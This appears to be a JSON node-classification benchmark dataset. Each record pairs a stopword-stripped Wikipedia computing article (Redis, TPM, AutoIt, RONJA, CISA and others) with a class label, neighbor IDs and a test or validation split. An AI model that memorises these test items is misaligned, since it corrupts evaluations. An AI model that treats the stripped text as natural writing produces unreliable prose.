      2281,
      363,
      5612,
      5741,
      7148,
      7919,
      2804,
      3573,
      5492,
      11383,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7342,
    "label": 6,
    "text": "Mount_Rainier_(packet_writing):mount rainier packet writing mount rainier mrw format writable optical discs provides packet writing defect management goal replacement floppy disk named mount rainier volcano near seattle washington united states mount rainier used drives explicitly support part scsi/mmc work atapi works standard cd-r cd-rw dvd+/-r dvd+/-rw media physical format mrw disk managed drive firmware remaps physical drive blocks virtual defect-free space thus host computer see physical format disk sequence data blocks capable holding filesystem time needed disk formatting shortened one minute background formatting capabilities drive formatting allocates sectors end disk defect management defective sectors recorded table lead-in administrative area copy table lead-out host computer perspective mrw disc provides defect-free block-accessible device upon host supported filesystem may written filesystems may fat32 ntfs etc. preferred format usually udf 1.02 file format widely supported mrw-formatted cd-rw udf filesystem gives approximately 500 mb free space mt rainier allows write access disc within seconds insertion spin-up even background formatting sequence taking place technology user would wait formatting complete writing data new disc even possible read write mrw disks without mrw-compatible drive remapper device driver needed example easywrite reader windows alternative mrw physically format disc udf 1.5 higher using spared build achieved use specialized packet writing software operating systems support udf versions 1.5 mrw capabilities overlap somewhat udf 1.5+ advantages mrw udf 1.5+ include advantage udf 1.5+ mrw include mount rainier implemented natively windows vista windows 7 linux built-in mrw support since kernel version 2.6.2 2004 amiga os4 supports natively since first beta appeared 2004 support reading format also added mac os x operating systems n't support mrw natively notably windows xp prior versions need third-party software read write mrw-formatted discs tend packet writing utilities allow native udf filesystems written optical media optical disk software isobuster support mount rainier non-mr drives easywrite logo marketing symbol created philips cd drives mount rainier compatible cd-mrw stands compact disc – mount rainier read/write",
    "neighbors": [
      3841,
      9762,
      5413,
      5062,
      7720,
      8075,
      2221,
      6062,
      5231,
      3760,
      2193,
      8110,
      3315,
      823,
      5816,
      6233,
      7290,
      5596
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7343,
    "label": 9,
    "text": "AutoIt:autoit autoit freeware programming language microsoft windows earliest release primarily intended create automation scripts sometimes called macros microsoft windows programs since grown include enhancements programming language design overall functionality scripting language autoit 1 2 statement-driven designed primarily simulating user interaction version 3 onward autoit syntax similar found basic family languages form autoit general-purpose third-generation programming language classical data model variant data type store several types data including arrays autoit automation script converted compressed stand-alone executable run computers autoit interpreter installed wide range function libraries known udfs user defined functions also included standard available website add specialized functionality autoit also distributed ide based free scite editor compiler help text fully integrated provide de facto standard environment developers using autoit autoit typically used produce utility software microsoft windows automate routine tasks systems management monitoring maintenance software installation also used simulate user interaction whereby application driven via automated form entry keypresses mouse clicks things autoit script autoit also used low-cost laboratory automation applications include instrument synchronisation alarm monitoring results gathering devices cnc routers 3d-printers also controlled developers autoit originally released source code gnu general public license gpl practice discontinued beginning version 3.2.0 august 2006 following terms gpl code version 3.1 used create fork autohotkey project community continuing develop release code gpl",
    "neighbors": [
      9216,
      9345,
      9728,
      5380,
      3718,
      7431,
      7691,
      8588,
      1805,
      6797,
      9997,
      786,
      11412,
      11413,
      22,
      3736,
      3481,
      537,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      5032,
      5546,
      7851,
      10666,
      10924,
      8494,
      303,
      7983,
      11315,
      9780,
      4410,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      963,
      8262,
      10750,
      712,
      847,
      5968,
      11219,
      1879,
      92,
      11229,
      8414,
      2915,
      9188,
      5733,
      8297,
      4074,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 7344,
    "label": 6,
    "text": "Lnfs:lnfs lnfs plan 9 file system enabling use long filenames filesystems support similar umsdos file system linux",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7345,
    "label": 4,
    "text": "Cybersecurity_Information_Sharing_Act:cybersecurity information sharing act cybersecurity information sharing act cisa 113th congress 114th congress united states federal law designed improve cybersecurity united states enhanced sharing information cybersecurity threats purposes law allows sharing internet traffic information u.s. government technology manufacturing companies bill introduced u.s. senate july 10 2014 passed senate october 27 2015 opponents question cisa value believing move responsibility private businesses government thereby increasing vulnerability personal private information well dispersing personal private information across seven government agencies including nsa local police text bill incorporated amendment consolidated spending bill u.s. house december 15 2015 signed law president barack obama december 18 2015 cybersecurity information sharing act introduced july 10 2014 113th congress able pass senate intelligence committee vote 12-3 bill reach full senate vote end congressional session bill reintroduced 114th congress march 12 2015 bill passed senate intelligence committee vote 14-1 senate majority leader mitch mcconnell r-ky attempted attach bill amendment annual national defense authorization act blocked 56-40 reaching necessary 60 votes include amendment mitch mcconnell hoped bring bill senate-wide vote week august 3–7 unable take bill summer recess senate tentatively agreed limit debate 21 particular amendments manager amendment set time limits debate october 2015 us senate took bill back following legislation concerning sanctuary cities main provisions bill make easier companies share personal information government especially cases cyber security threats without requiring information sharing bill creates system federal agencies receive threat information private companies respect privacy bill includes provisions preventing sharing personal data irrelevant cyber security personal information get removed sharing procedure used variety ways shared cyber threat indicators used prosecute cyber crimes may also used evidence crimes involving physical force sharing national intelligence threat data among public private partners hard problem one care national intelligence threat sharing nits project intended innovative solution hard problem altogether nits innovative useful first ensure nits trustworthy private partners must indemnified indemnification takes act congress literally underlying impediment fulsome cooperation among buyers sellers peers within supply chain indemnification indemnification needed secure industry partners legal responsibility actions unfortunately congressional refusal offer indemnification remains impediment real collaboration least qualified immunity accorded immunity individuals performing tasks part government actions cisa received support advocacy groups including united states chamber commerce national cable telecommunications association financial services roundtable number business groups also opposed bill including computer communications industry association well individual companies twitter yelp apple reddit bsa software alliance appeared initially supportive cisa sending letter july 21 2015 urging senate bring bill debate september 14 2015 bsa published letter support amongst things cyber threat information sharing legislation addressed congress signed board members adobe apple inc. altium autodesk ca technologies datastax ibm microsoft minitab oracle salesforce.com siemens symantec prompted digital rights advocacy group fight future organize protest cisa following opposition campaign bsa stated letter expressed support cyber threat sharing legislation general endorse cisa pending cyber threat sharing bill particular bsa later stated opposed cisa current form computer communications industry association another major trade group including members google amazon.com cloudflare netflix facebook red hat yahoo also announced opposition bill proponents cisa include bill main cosponsors senators dianne feinstein d-ca richard burr r-nc senators announced opposition cisa including ron wyden d-or rand paul r-ky bernie sanders i-vt senator ron wyden d-or objected bill based classified legal opinion justice department written early george w bush administration obama administration states rely legal justification laid memo wyden made repeated requests us attorney general declassify memo dating least far back 2010 office inspector general report cited memo legal justification fbi warrantless wire-tapping program august 4 2015 white house spokesman eric schultz endorsed legislation calling senate take bill soon possible pass united states department homeland security initially supported bill jeh johnson secretary dhs calling bill move forward september 15 however august 3 letter senator al franken d-mn deputy secretary dhs alejandro mayorkas expressed desire connections brokered dhs given department charter protect executive branch networks letter dhs found issue direct sharing information government agencies advocating instead dhs sole recipient cyberthreat information allowing scrub private information addition department homeland security published privacy impact assessment detailing internal review proposed system handling incoming indicators industry privacy advocates opposed version cybersecurity information sharing act passed senate october 2015 left intact portions law said made amenable surveillance actual security quietly stripping several remaining privacy protections cisa criticized advocates internet privacy civil liberties electronic frontier foundation american civil liberties union compared criticized cyber intelligence sharing protection act proposals 2012 2013 passed united states house representatives pass senate united kingdom government policy cyber security scottish government information sharing",
    "neighbors": [
      9569,
      2148,
      5002,
      10090,
      3759,
      7887,
      9455,
      3858,
      5780,
      3323,
      8956,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 7346,
    "label": 8,
    "text": "Tkhtml:tkhtml tkhtml discontinued open-source browser engine written c using tk widget toolkit used primarily html viewer 3 hv3 minimalist web browser version 1 written using xf application builder functionality reasons part rewritten 2006 announced public build tkhtml alpha 10 passed acid2 test run tkhtml tcl/tk framework needed installed standard wish interpreter needed replaced wwwish interpreter use wysiwyg previewing function",
    "neighbors": [
      6154,
      6797,
      7951,
      10910,
      7983,
      692,
      10304,
      6338,
      4171,
      3407,
      4048,
      6231,
      11223,
      2139,
      487,
      7785,
      5612,
      11503,
      4728,
      124,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7347,
    "label": 7,
    "text": "Redis:redis redis remote dictionary server in-memory data structure project implementing distributed in-memory key-value database optional durability redis supports different kinds abstract data structures strings lists maps sets sorted sets hyperloglogs bitmaps streams spatial indexes project mainly developed salvatore sanfilippo sponsored redis labs open-source software released bsd 3-clause license name redis means remote dictionary server redis project began salvatore sanfilippo nicknamed antirez original developer redis trying improve scalability italian startup developing real-time web log analyzer encountering significant problems scaling types workloads using traditional database systems sanfilippo began prototype first proof concept version redis tcl later sanfilippo translated prototype c language implemented first data type list weeks using project internally success sanfilippo decided open source announcing project hacker news project began get traction among ruby community github instagram among first companies adopting sanfilippo hired vmware march 2010 may 2013 redis sponsored pivotal software vmware spin-off june 2015 development became sponsored redis labs.. october 2018 redis 5.0 released introducing redis stream new data structure allows storage multiple fields string values automatic time-based sequence single key redis made popular idea system considered time store cache using design data always modified read main computer memory also stored disk format unsuitable random access data reconstruct data back memory system restarts time redis provides data model unusual compared relational database management system rdbms user commands describe query executed database engine specific operations performed given abstract data types hence data must stored way suitable later fast retrieval without help database system form secondary indexes aggregations common features traditional rdbms redis implementation makes heavy use fork system call duplicate process holding data parent process continues serve clients child process creates copy data disk according monthly db-engines rankings redis often popular key-value database redis also ranked 4 nosql database user satisfaction market presence based user reviews popular nosql database containers 1 nosql database 2015 ranking website stackshare.io voted loved database stack overflow developer survey 2017 2018 2019 since version 2.6 redis features server-side scripting language lua many programming languages redis language bindings client side including actionscript c c++ c chicken clojure common lisp crystal dart elixir erlang go haskell haxe io java javascript node.js julia lua objective-c ocaml perl php pure data python r racket ruby rust scala smalltalk swift tcl several client software programs exist languages redis maps keys types values important difference redis structured storage systems redis supports strings also abstract data types type value determines operations called commands available value redis supports high-level atomic server-side operations like intersection union difference sets sorting lists sets sorted sets data types supported based redis modules api redis module redisjson implements ecma-404 javascript object notation json data interchange standard native data type redis typically holds whole dataset memory versions 2.4 could configured use refer virtual memory dataset stored disk feature deprecated persistence redis achieved two different methods first snapshotting dataset asynchronously transferred memory disk regular intervals binary dump using redis rdb dump file format alternatively journaling record operation modifies dataset added append-only file aof background process redis rewrite append-only file background avoid indefinite growth journal journaling introduced version 1.1 generally considered safer approach default redis writes data file system least every 2 seconds less robust options available needed case complete system failure default settings seconds data would lost redis supports master-replica replication data redis server replicate number replicas replica may master another replica allows redis implement single-rooted replication tree redis replicas configured accept writes permitting intentional unintentional inconsistency instances publish/subscribe feature fully implemented client replica may subscribe channel receive full feed messages published master anywhere replication tree replication useful read write scalability data redundancy durability data needed in-memory nature redis allows perform well compared database systems write every change disk considering transaction committed redis operates single process single-threaded double-threaded rewrites aof append-only file thus single redis instance use parallel execution tasks stored procedures redis introduced clustering april 2015 release version 3.0 cluster specification implements subset redis commands single-key commands available multi-key operations commands related unions intersections restricted keys belonging node commands related database selection operations unavailable redis cluster scale 1,000 nodes achieve acceptable write safety continue operations nodes fail due nature database design typical use cases session caching full page cache message queue applications leaderboards counting among others large companies twitter using redis amazon web services offering redis portfolio microsoft offering redis cache azure companies used redis created commercial offerings around february 21 2019 redis labs relicensed redis modules redis source available license source-available arrangement prohibits users selling software redis modules formerly licensed affero general public license",
    "neighbors": [
      5249,
      8582,
      5257,
      6153,
      9225,
      5900,
      2062,
      1935,
      19,
      3219,
      2966,
      1047,
      1049,
      1435,
      5403,
      9245,
      6943,
      2339,
      3876,
      5031,
      4777,
      5034,
      4781,
      5165,
      5677,
      7983,
      8495,
      1203,
      692,
      2105,
      6718,
      5953,
      8644,
      10565,
      8262,
      8008,
      5833,
      9544,
      5835,
      10059,
      2253,
      8269,
      10447,
      7248,
      6993,
      7889,
      2901,
      10198,
      6359,
      11221,
      7769,
      4186,
      860,
      9828,
      10470,
      9320,
      1257,
      2666,
      8554,
      2413,
      6769,
      10097,
      3705,
      6522,
      7292,
      2045,
      3326
    ],
    "mask": "None"
  },
  {
    "node_id": 7348,
    "label": 4,
    "text": "Guardian_Analytics:guardian analytics guardian analytics american privately held company headquartered mountain view california provides behavioral analytics machine learning technology preventing banking fraud established 2005 products based anomaly detection monitor financial transactions 2012 guardian analytics together mcafee dissected us 78 million cyber attack titled operation high roller 2013 guardian analytics listed among top 10 influencers banking information security september 2016 nearly 430 financial institutions using guardian analytics products mitigate fraud risk rely company stop sophisticated criminal attacks guardian analytics offers fraud prevention services financial institutions general architecture includes two main components first component risk engine merges analytics behavior-based models user create probabilistic profile individual recognizing anomalous behavior possible identify fraudulent activity loss occurs risk engine dynamically adapts user behavior able detect new fraud attacks second component visual analytics data browser used financial institutions monitor investigate resolve potential fraud accessing collected data visual interface shows risk scores underlying contextual information facilitate analysis investigation guardian analytics able detect fraudulent activities account takeover account reconnaissance fraudulent wire ach bill pay transactions guardian analytics specific type threat protect cyber attacks phishing vishing man browser software transparent account holders require action side guardian analytics markets several services targeting particular types financial interactions guardian analytics marketed software service deployed company sas 70 type ii certified environment frauddesk fraud monitoring managed service",
    "neighbors": [
      704,
      5986,
      11330,
      1899,
      467,
      278,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 7349,
    "label": 3,
    "text": "SIMMON:simmon simmon simulation monitor proprietary software testing system developed late 1960s ibm product test laboratory poughkeepsie n.y designed then-new line system/360 computers vehicle testing software ibm developing architecture simmon first described ibm simsymp 1968 symposium held rye new york simmon hypervisor similar ibm cp-40 system independently developed cambridge scientific center time chief difference cp-40 simmon supported single virtual machine testing single guest program running cp-40 supported many virtual machines time-sharing production work cp-40 evolved many stages present vm/cms operating system simmon useful test vehicle many years simmon designed dynamically include independently developed programs test tools testing target guest program simmon kernel maintained control hardware guest coordinated invocation test tools two modes operation provided mode instruction guest program simulated without ever passing control directly guest instruction set simulator simmon unusual simulated architecture running i.e ibm system/360/370 order magnitude slower interrupt mode allowed close attention operation guest would mode used various instruction trace test tools interrupt mode a/k/a bump mode constrained guest program run user program state simmon kernel handling hardware interrupts simulating privileged instructions guest attempted execute mode could used example test tool simulate hardware device test tools developed use simmon error generation test test tool developed test device support error recovery ibm pcp primary control program operating system developed used novel efficient table-driven finite state machine fsm inject simulated errors verify operating system followed detailed specifications actions taken attempt recovery table driven fsm aspect granted u.s. patent mapper confused unisys product name statistical performance analysis tool operated allowing program test run interrupt mode also used system timer periodically interrupt addresses tested program interrupted recorded later summarized tabulated form map showing density interrupts memory addresses result resembled nuclear scintigraphy images showing parts program frequently used test conditions hotspots instruction trace tool written help identify performance problem areas ibm mft operating system branch trace data written tape summarized report took form listing similar storage dump program entry points exit points identified including frequency use instruction sequence data identified memory management component consuming 20 cpu resources used justify task force try improve performance specific test tool distorted timing relationships running simmon found number problems particularly input/output sections unless simmon tool put place normalize delay i/o events would appear guest program happening unnaturally quickly programs test -- so-called guest programs -- capable stand-alone operation bare hardware simmon provided services test tools guest programs tested using simmon",
    "neighbors": [
      5378,
      6150,
      2058,
      3082,
      10508,
      4238,
      8466,
      789,
      2212,
      6438,
      295,
      10537,
      7217,
      7733,
      9525,
      9655,
      5049,
      2236,
      318,
      5697,
      11075,
      5702,
      7248,
      5457,
      1362,
      7507,
      2910,
      1513,
      8439
    ],
    "mask": "None"
  },
  {
    "node_id": 7350,
    "label": 5,
    "text": "RONJA:ronja ronja reasonable optical near joint access free-space optical communication system originating czech republic developed karel kulhavý twibright labs released 2001 transmits data wirelessly using beams light ronja used create 10 mbit/s full duplex ethernet point-to-point link estimated 1000 2000 links built worldwide range basic configuration device consists receiver transmitter pipe optical head mounted sturdy adjustable holder two coaxial cables used connect rooftop installation protocol translator installed house near computer switch range extended doubling tripling transmitter pipe building instructions blueprints schematics published gnu free documentation licence free software tools used development author calls level freedom user controlled technology ronja project twibright labs building instructions written inexperienced builder mind basic operations like drilling soldering etc. explained several techniques – drilling templates detailed checks soldering testing procedures – employed minimize errors critical places help speed work printed circuit boards downloadable ready manufacture instructions fabhouse people previous experience building electronics reported mailing list device ran first try 154 installations worldwide registered gallery technical data pictures brightest variant lumileds hpwt-bd00-f4000 led 130 mm diameter cheap chinese magnifying glass lenses range 1.4 km less bright easier buy e4000 variant hpwt-bd00 yields 1.3 km speed always 10 mbit/s full duplex regardless distance definition clear visibility transmitter receiver essential beam obscured way link stop working typically problems may occur conditions snow dense fog one device weighs 15.5 kg requires 70 hours building time requires ability set full duplex manually network card switch take advantage full duplex since n't support autonegotiation must plugged directly pc switch using integral 1 ethernet cable complete ronja system made 2 transceivers 2 optical transmitters 2 optical receivers assembled individually combination complete system layout shown block diagram usual approach fso free space optics preamplifiers employ transimpedance amplifier transimpedance amplifier sensitive broadband high-speed device featuring feedback loop fact means layout plagued stability problems special compensation pin diode capacitance must performed therefore n't allow selection wide range cheap pin photodiodes varying capacitances ronja however uses feedbackless design pin high working electrical resistance 100 kilohms together total input capacitance roughly 8 pf 5 pf pin 3 pf input mosfet cascode makes device operate passband 6 db/oct slope low pass formed pin working resistance total input capacitance signal immediately amplified remove danger contamination signal noise compensation 6 db/oct slope done derivator element programming pins ne592 video amplifier surprisingly flat characteristic obtained pin diode equipped 3 kω working resistor operate flat band mode range reduced 30 due thermal noise 3 kω resistor hsdl4220 infrared led originally unsuitable 10 mbit/s operation bandwidth 9 mhz 10 mbit/s manchester-modulated systems need bandwidth around 16 mhz operation usual circuit current drive would lead substantial signal corruption range reduction therefore twibright labs developed special driving technique consisting driving led directly 15-fold 74ac04 gate output parallel rf voltage applied current-unlimited directly led large capacitors voltage keep nominal led average current 100ma varies temperature component tolerances ac-bypassed current sense resistor put series led feedback loop measures voltage resistor keeps preset level varying supply voltage 74ac04 gates therefore nominally digital 74ac04 operating structured power cmos switch completely analog mode way led junction flooded cleared carriers quickly possible basically short circuit discharge pushes speed led maximum makes output optical signal fast enough range/power ratio faster red hpwt-bd00-f4000 led side effects brutal driving technique 1 led overshoots beginning longer 5 mhz/1 mhz impulses 2x brightness measured adverse effect range 2 blocking ceramic capacitor bank backing 74ac04 switching array crucial correct operation charging discharging led done short circuit dimensioning bank causes leading trailing edges optical output grow longer ronja twister electronic interface free space optical datalink based counter shift register chips part ronja design effectively optical ethernet transceiver without optical drive part original design superseded twister2 logic circuit remained one doctoral dissertation 10 master bachelor theses three high school graduation exams one high school vocational activity 18 master bachelor theses one university semester project cite ronja czech technical university built 120 educational link buildings two faculties teaching students practically fso one czech private university dedicates page textbook ronja additional 12 journal conference university articles based largely ronja soderberg studying ronja sociologically writes arguably first project vindicated methods licensing schemes free software development applied practices open hardware development pulled state-of-the-art technology without backing universities firms ronja project whole toolchain built strictly upon free tools source files provided free gpl allows anyone enter development start manufacture invest technology without entry costs costs normally include software licence costs time investment resolution compatibility issues proprietary applications costs intellectual property licence negotiations decision conceive project way inspired observed organizational efficiency free software christmas 2001 ronja became world first 10 mbit/s free space optics device free sources examples tools used development",
    "neighbors": [
      3040,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 7351,
    "label": 2,
    "text": "Commit_charge:commit charge computing commit charge term used microsoft windows operating systems describe total amount virtual memory guaranteed processes fit physical memory page file systems pagefile may thought maximum potential pagefile usage systems pagefile still counted virtual address space must remain physical memory ram times accessed windows task manager utility windows xp server 2003 performance tab shows three counters related commit charge program process explorer reports set values labeling total current additionally providing percentages peak current towards limit value commit charge increases program opened used goes program closed also change already-running programs allocate free private virtual memory example virtualalloc virtualfree apis task manager utility windows xp windows server 2003 graphical displays labeled pf usage page file usage history despite labels reflect pagefile contents total current commit charge height graph area corresponds commit limit show much actually written pagefile maximum potential pagefile usage amount pagefile would used current contents ram removed windows 2000 windows nt 4.0 displays labeled mem usage actually show commit charge commit limit similar displays task manager windows vista later changed reflect usage physical memory task manager processes display process contribution total commit charge shown vm size column windows xp server 2003 value labeled commit size windows vista later total commit charge always larger sum values total includes system-wide allocations paged pool display mem usage column windows xp server 2003 working set memory column windows vista later shows process current working set count physical memory ram rather virtual address space represents subset process virtual address space valid meaning referenced without incurring page fault commit charge process include major contributions process virtual address space mapped files reason process working set portion address space referenced without incurring page fault may larger contribution total commit charge total commit charge inclusive total memory physical virtual actually use commit limit may increased either creating additional pagefiles pagefile expansion enabled expanding existing one operating system expand pagefile automatically possible total commit charge approaches limit event popup window displayed stating system running low virtual memory system ever runs completely commit charge total reaches limit popup window displayed stating system virtual memory may become extremely sluggish even nonresponsive closing programs user still able point decreases total commit charge may thereby free system",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      3615,
      9762,
      8227,
      8740,
      10281,
      7728,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      9300,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      3250,
      5300,
      2749,
      200,
      9420,
      5840,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      11539,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      4458,
      6506,
      9593,
      2943,
      1418,
      5003,
      5004,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 7352,
    "label": 4,
    "text": "Security_as_a_service:security service security service secaas business model service provider integrates security services corporate infrastructure subscription basis cost effectively individuals corporations provide total cost ownership considered secaas inspired software service model applied information security type services require on-premises hardware avoiding substantial capital outlays security services often include authentication anti-virus anti-malware/spyware intrusion detection penetration testing security event management among others outsourced security licensing delivery boasting multibillion-dollar market secaas provides users internet security services providing protection online threats attacks ddos constantly searching access points compromise websites demand use cloud computing skyrockets users vulnerable attacks due accessing internet new access points secaas serves buffer persistent online threats cloud security alliance csa organization dedicated defining raising awareness secure cloud computing csa defined following categories secaas tools created series technical implementation guidance documents help businesses implement understand secaas categories include secaas typically offered several forms security service offers number benefits including secaas number deficiencies make insecure many applications individual security service request adds least one across-the-'net round-trip counting installer packages four opportunities hacker intercept conversation secaas makes security handling uniform security breach one request security broken requests broadest attack surface also multiplies rewards incentive hacker value gained effort dramatically increased factors especially tailored resources nation/state-sponsored hacker biggest challenge secaas market maintaining reputation reliability superiority standard non-cloud services secaas whole seemingly become mainstay cloud market cloud-based website security ’ cater businesses specific requirements must properly assessed individual needs business cater end consumers afford keep data loose vulnerable hacker attacks heaviest part secaas educating businesses since data biggest asset businesses cios ctos take care overall security company",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      5662,
      5666,
      2084,
      9766,
      39,
      5159,
      3629,
      3121,
      5681,
      7739,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      1108,
      4194,
      5732,
      2170,
      4236,
      10893,
      6307,
      2217,
      9906,
      4289,
      3269,
      1224,
      6367,
      2795,
      3819,
      10492,
      8956,
      253,
      8446,
      8451,
      272,
      2328,
      4377,
      8986,
      11038,
      6444,
      8495,
      5433,
      11070,
      8515,
      8520,
      4429,
      1362,
      7512,
      11611,
      3428,
      3941,
      10090,
      8044,
      5499,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      11157,
      10681,
      448,
      2496,
      3521,
      11201,
      9682,
      467,
      10200,
      6618,
      10718,
      997,
      6632,
      1001,
      2539,
      7660,
      8176,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 7353,
    "label": 0,
    "text": "BulPosCor:bulposcor bulgarian part speech-annotated corpus bulposcor bulgarian български пос анотиран корпус булпоскор morphologically annotated general monolingual corpus written language item text assigned grammatical tag bulposcor created department computational linguistics institute bulgarian language bulgarian academy sciences consists 174 697 lexical items bulposcor compiled structured brown corpus bulgarian sampling 300+ word-excerpts expanded sentence boundary original bcb files way preserve bcb overall structure annotation process consists primary stage automatically assigning tags bulgarian grammar dictionary stage manual resolving morphological ambiguities.the disambiguated corpus consists 174,697 lexical units bulposcor search interface koeva sv gramatichen rechnik na balgarskiya ezik.opisanie na koncepciyata za organizaciyata na lingvistichnite danni grammatical dictionary bulgarian в български език 6 1998 с 49-58 koeva sv. sv leseva i. stoyanova e. tarpomanova m. todorova bulgarian tagged corpora proceedings fifth international conference formal approaches south slavic balkan languages 18–20 october 2006 sofia bulgaria pp 78–86 todorova maria rositsa dekova balgarski pos anotiran korpus – osobenosti na gramatichnata anotaciya bulgarian pos annoted corpus – specifics grammatical annotation в езикови ресурси и технологии за български език състав и научн ред св коева д. благоева т. тинчев софия академично издателство „ марин дринов “ 2014",
    "neighbors": [
      1890,
      4469,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 7354,
    "label": 4,
    "text": "Trusted_Platform_Module:trusted platform module trusted platform module tpm also known iso/iec 11889 international standard secure cryptoprocessor dedicated microcontroller designed secure hardware integrated cryptographic keys trusted platform module tpm conceived computer industry consortium called trusted computing group tcg standardized international organization standardization iso international electrotechnical commission iec 2009 iso/iec 11889 tcg continued revise tpm specifications last revised edition tpm main specification version 1.2 published march 3 2011 consisted three parts based purpose second major version tpm however tcg released tpm library specification 2.0 builds upon previously published tpm main specification latest edition released september 29 2016 several errata latest one dated january 8 2018 trusted platform module provides computer programs use tpm authenticate hardware devices since tpm chip unique secret rsa key burned produced pushing security hardware level provides protection software-only solution united states department defense dod specifies new computer assets e.g. server desktop laptop thin client tablet smartphone personal digital assistant mobile phone procured support dod include tpm version 1.2 higher required disa stigs technology available dod anticipates tpm used device identification authentication encryption device integrity verification primary scope tpm assure integrity platform context integrity means behave intended platform computer device regardless operating system ensure boot process starts trusted combination hardware software continues operating system fully booted applications running responsibility assuring said integrity using tpm firmware operating system example unified extensible firmware interface uefi use tpm form root trust tpm contains several platform configuration registers pcrs allow secure storage reporting security relevant metrics metrics used detect changes previous configurations decide proceed good examples found linux unified key setup luks bitlocker privatecore vcage memory encryption see example tpm use platform integrity trusted execution technology txt creates chain trust could remotely attest computer using specified hardware software full disk encryption utilities dm-crypt bitlocker use technology protect keys used encrypt computer storage devices provide integrity authentication trusted boot pathway includes firmware boot sector operating systems often require authentication involving password means protect keys data systems authentication mechanism implemented software access prone dictionary attacks since tpm implemented dedicated hardware module dictionary attack prevention mechanism built effectively protects guessing automated dictionary attacks still allowing user sufficient reasonable number tries without level protection passwords high complexity would provide sufficient protection application use tpm chip uses exist give rise privacy concerns physical presence feature tpm addresses concerns requiring bios-level confirmation operations activating deactivating clearing changing ownership tpm someone physically present console machine starting 2006 many new laptops sold built-in tpm chip future concept could co-located existing motherboard chip computers device tpm facilities could employed cellphone pc either lpc bus spi bus used connect tpm chip tcg certified tpm chips manufactured infineon technologies nuvoton stmicroelectronics assigned tpm vendor ids advanced micro devices atmel broadcom ibm infineon intel lenovo national semiconductor nationz technologies nuvoton qualcomm rockchip standard microsystems corporation stmicroelectronics samsung sinosun texas instruments winbond five different types tpm 2.0 implementations tpm 2.0 addresses many use cases similar features details different tpm 2.0 backward compatible tpm 1.2 tpm 2.0 policy authorization includes 1.2 hmac locality physical presence pcr adds authorization based asymmetric digital signature indirection another authorization secret counters time limits nvram values particular command command parameters physical presence permits anding oring authorization primitives construct complex authorization policies tcg faced resistance deployment technology areas authors see possible uses specifically related trusted computing may raise privacy concerns concerns include abuse remote validation software manufacturerand user owns computer systemdecides software allowed run possible ways follow actions taken user recorded database manner completely undetectable user truecrypt disk encryption utility well derivative veracrypt support tpm original truecrypt developers opinion exclusive purpose tpm protect attacks require attacker administrator privileges physical access computer attacker physical administrative access computer circumvent tpm e.g. installing hardware keystroke logger resetting tpm capturing memory contents retrieving tpm-issued keys condemning text goes far claim tpm entirely redundant veracrypt publisher reproduced original allegation changes replacing truecrypt veracrypt private endorsement key fundamental security tpm circuit never made available end-user private key must known hardware chip manufacturer manufacture time otherwise would able burn key circuit guarantees private key kept manufacturer shared government agencies anyone access private endorsement key would able forge chip identity break security chip provides thus security tpm relies entirely manufacturer authorities country hardware produced 2010 christopher tarnovsky presented attack tpms black hat briefings claimed able extract secrets single tpm able 6 months work inserting probe spying internal bus infineon sle 66 cl pc 2015 part snowden revelations revealed 2010 us cia team claimed internal conference carried differential power analysis attack tpms able extract secrets october 2017 reported code library developed infineon widespread use tpms contained vulnerability known roca allowed rsa private keys inferred public keys result systems depending upon privacy keys vulnerable compromise identity theft spoofing cryptosystems store encryption keys directly tpm without blinding could particular risk types attacks passwords factors would meaningless attacks extract encryption secrets currently tpm 